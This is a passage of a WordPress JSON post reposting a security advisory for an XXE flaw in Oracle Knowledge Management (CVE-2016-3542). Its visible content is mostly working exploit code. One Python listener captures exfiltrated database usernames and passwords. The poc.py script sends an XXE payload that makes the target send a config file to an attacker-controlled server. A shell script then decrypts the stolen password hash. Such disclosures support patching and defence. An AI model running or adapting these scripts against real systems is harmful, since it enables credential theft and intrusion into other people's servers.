data-line=\"crayon-58cf040336fc1447319366-43\">43<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-44\">44<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-45\">45<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-46\">46<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-47\">47<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-48\">48<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-49\">49<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-50\">50<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-51\">51<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-52\">52<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-53\">53<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-54\">54<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58cf040336fc1447319366-55\">55<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58cf040336fc1447319366-56\">56<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-1\"><span class=\"crayon-p\">#!\/usr\/bin\/python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-2\"><span class=\"crayon-p\"># Notes:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-3\"><span class=\"crayon-p\"># &#8211; This code just listens for client requests on port 1337<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-58cf040336fc1447319366-4\"><span class=\"crayon-p\"># &#8211; it looks for database strings and prints them out<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-5\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-6\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-8\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">re<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-9\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-10\"><span class=\"crayon-p\"># Create a TCP\/IP socket<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-11\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AF_INET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOCK_STREAM<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-12\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-13\"><span class=\"crayon-p\"># Bind the socket to the port<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-14\"><span 
class=\"crayon-v\">server_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;0.0.0.0&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1337<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-15\"><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;starting up on %s port %s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">server_address<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-18\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">bind<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">server_address<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-19\"><span class=\"crayon-h\">\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-20\"><span class=\"crayon-p\"># Listen for incoming connections<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-21\"><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">listen<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-22\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-23\"><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Wait for a connection<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-25\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;waiting for a connection&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-26\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">client_address<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sock<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">accept<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-28\"><span 
class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;connection from&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">client_address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-29\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Receive the data in small chunks and retransmit it<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">while<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">True<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-32\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">recv<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">2048<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" 
id=\"crayon-58cf040336fc1447319366-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-35\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-p\">#print data<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-36\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchuser<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;user&gt;(.*)&lt;\/user&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-37\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchpassword<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;password&gt;(.*)&lt;\/password&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-38\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">re<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">search<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;&lt;url&gt;(.*)&lt;\/url&gt;&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">data<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-39\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">matchuser <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">matchpassword <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-40\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database SID is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchurl<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-41\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database username is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchuser<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-42\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;(+) The database password is: %s&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">matchpassword<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">group<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-43\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-44\"><span class=\"crayon-h\">\t\t\t\t\t<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-45\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-46\"><span class=\"crayon-h\">\t\t\t\t<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-47\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-48\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;&gt;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">stderr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;no more data from&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">client_address<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-49\"><span class=\"crayon-e\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">break<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-50\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">except <\/span><span class=\"crayon-v\">Exception<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-52\"><span class=\"crayon-h\">\t&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span 
class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-53\"><span class=\"crayon-h\">\t\t<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">finally<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58cf040336fc1447319366-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\"># Clean up the connection<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58cf040336fc1447319366-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">connection<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">close<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong>poc.py<\/strong><\/p>\n<pre><code>#!\/usr\/bin\/python\n# Notes:\n# - This code steals the C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml file via the XXE bug.\n# - You need to run ruby xxeserve.rb -o 0.0.0.0 and use an interface ip for the &quot;local xxe server&quot;\n# - The code requires a proxy server to be setup on 127.0.0.1:8080 although, this can be changed\n\nimport requests\nimport json\nimport sys\n\n# burp, ftw\nproxies = {\n  &quot;http&quot;: &quot;http:\/\/127.0.0.1:8080&quot;,\n}\n\nif len(sys.argv) &lt; 3:\n\tprint &quot;(+) Usage: %s [local xxe server:port] [target]&quot; % sys.argv[0]\n\tprint &quot;(+) Example: %s 172.16.77.1:4567 172.16.77.128&quot; % sys.argv[0]\n\tsys.exit(1)\n\nlocalxxeserver = sys.argv[1]\ntarget = sys.argv[2]\n\npayload = {'method' : '2', 'inputXml': '''&lt;?xml version=&quot;1.0&quot; encoding=&quot;utf-8&quot;?&gt;\n&lt;!DOCTYPE root [\n&lt;!ENTITY %% remote SYSTEM &quot;http:\/\/%s\/xml?f=C:\/Oracle\/Knowledge\/IM\/instances\/InfoManager\/custom.xml&quot;&gt;\n%%remote;\n%%int;\n%%trick;]&gt;''' % localxxeserver}\n\nurl = 'http:\/\/%s:8226\/imws\/Result.jsp' % target\n\nheaders = {'content-type': 'application\/x-www-form-urlencoded'}\nprint &quot;(+) pulling custom.xml for the db password...&quot;\nr = requests.post(url, data=payload, headers=headers, proxies=proxies)\nif r.status_code == 200:\n\tprint &quot;(!) Success! please check the gopher.py window!&quot;\n<\/code><\/pre>\n<p><strong>decrypt.sh<\/strong><\/p>\n<pre><code>#!\/bin\/sh\nif [ &quot;$#&quot; -ne 1 ]; then\n    echo &quot;(!) Usage: $0 [hash]&quot;\nelse\n    java -classpath &quot;infra_encryption.jar:oraclepki.jar:osdt_core.jar:osdt_cert.jar:commons-codec-1.3.jar&quot; -DKEYSTORE_LOCATION=&quot;keystore&quot; com.inquira.infra.security.OKResourceEncryption $1\nfi\n<\/code><\/pre>\n<p>
<\/p>\n<p><strong>CVE Details<\/strong><br \/> <a href=\"https:\/\/web.nvd.nist.gov\/view\/vuln\/detail?vulnId=CVE-2016-3542\" target=\"_blank\">CVE-2016-3542<\/a><\/p>\n<p><strong>Affected Products<\/strong><br \/> Oracle Knowledge Management versions 12.1.1, 12.1.2, 12.1.3, 12.2.3, 12.2.4, and 12.2.5.<\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3052\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/blogs.securiteam.com\/wp-content\/uploads\/2017\/03\/oracle_xxe_process-300x176.png\"\/><\/p>\n<p><strong>Credit to Author: Maor Schwartz| Date: Sun, 19 Mar 2017 08:05:05 +0000<\/strong><\/p>\n<p>Vulnerability Summary The following advisory describe Information Disclosure found in Oracle Knowledge Management version 8.5.1. By enabling searches across a wide variety of sources, Oracle&#8217;s InQuira knowledge management products offer simple and convenient ways for users to access knowledge that was once hidden in the myriad systems, applications, and databases used to store enterprise content. 
&#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3052\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Oracle Knowledge Management XXE Leading to a RCE<\/span> <span class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10755,11680,11681,11682],"class_list":["post-7034","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-commentary","tag-directory-traversal","tag-external-entity-xxe","tag-remote-code-execution"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7034","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=7034"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/7034\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=7034"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=7034"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=7034"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}